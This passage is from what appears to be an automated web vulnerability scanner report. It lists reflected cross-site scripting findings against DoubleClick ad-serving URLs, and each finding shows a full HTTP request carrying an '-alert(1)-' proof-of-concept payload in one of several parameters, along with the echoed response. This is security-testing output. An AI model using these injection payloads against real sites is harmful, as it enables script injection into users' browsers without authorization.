...[SNIP]...

4.87. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5e2f"-alert(1)-"29247c7cc7e was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391f5e2f"-alert(1)-"29247c7cc7e&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:16 GMT
Expires: Sat, 29 Jan 2011 05:20:16 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391f5e2f"-alert(1)-"29247c7cc7e&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

4.88. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b627"-alert(1)-"f37e95824ee was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543933b627"-alert(1)-"f37e95824ee&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543933b627"-alert(1)-"f37e95824ee&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false
...[SNIP]...

4.89. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f838'-alert(1)-'0c67bb9771d was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543937f838'-alert(1)-'0c67bb9771d&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543937f838'-alert(1)-'0c67bb9771d&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.90. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4af20'-alert(1)-'1a377f66add was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2562924af20'-alert(1)-'1a377f66add&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2562924af20'-alert(1)-'1a377f66add&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.91. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965de"-alert(1)-"48eda9b2c46 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292965de"-alert(1)-"48eda9b2c46&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:14 GMT
Expires: Sat, 29 Jan 2011 05:20:14 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292965de"-alert(1)-"48eda9b2c46&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fs
...[SNIP]...

4.92. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bab'-alert(1)-'48cd638711e was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=845bab'-alert(1)-'48cd638711e&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:25 GMT
Expires: Sat, 29 Jan 2011 05:20:25 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=845bab'-alert(1)-'48cd638711e&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.93. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97619"-alert(1)-"aee72703284 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=897619"-alert(1)-"aee72703284&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:24 GMT
Expires: Sat, 29 Jan 2011 05:20:24 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=897619"-alert(1)-"aee72703284&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.94. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 159c7'-alert(1)-'21f1ab1a58 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0159c7'-alert(1)-'21f1ab1a58&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5990
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:24 GMT
Expires: Sat, 29 Jan 2011 05:20:24 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
net/click%3Bh%3Dv8/3a9e/f/7d/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0159c7'-alert(1)-'21f1ab1a58&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.95. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc101"-alert(1)-"4c6cf87a680 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0dc101"-alert(1)-"4c6cf87a680&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0dc101"-alert(1)-"4c6cf87a680&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.96. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bef7"-alert(1)-"8089e6c04bf was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=7bef7"-alert(1)-"8089e6c04bf HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:28 GMT
Expires: Sat, 29 Jan 2011 05:20:28 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/7/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=7bef7"-alert(1)-"8089e6c04bfhttp://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

4.97. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7ea6'-alert(1)-'1fafd552781 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=d7ea6'-alert(1)-'1fafd552781 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:29 GMT
Expires: Sat, 29 Jan 2011 05:20:29 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/7/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=d7ea6'-alert(1)-'1fafd552781http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.98. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0271'-alert(1)-'62af3c29b54 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1b0271'-alert(1)-'62af3c29b54&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
d.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1b0271'-alert(1)-'62af3c29b54&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.99. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cc5"-alert(1)-"e78fc2ba4dd was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1c1cc5"-alert(1)-"e78fc2ba4dd&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
d.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1c1cc5"-alert(1)-"e78fc2ba4dd&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFou
...[SNIP]...

4.100. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b608"-alert(1)-"043dce3e05a was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=5222361b608"-alert(1)-"043dce3e05a&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:18 GMT
Expires: Sat, 29 Jan 2011 05:20:18 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=5222361b608"-alert(1)-"043dce3e05a&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

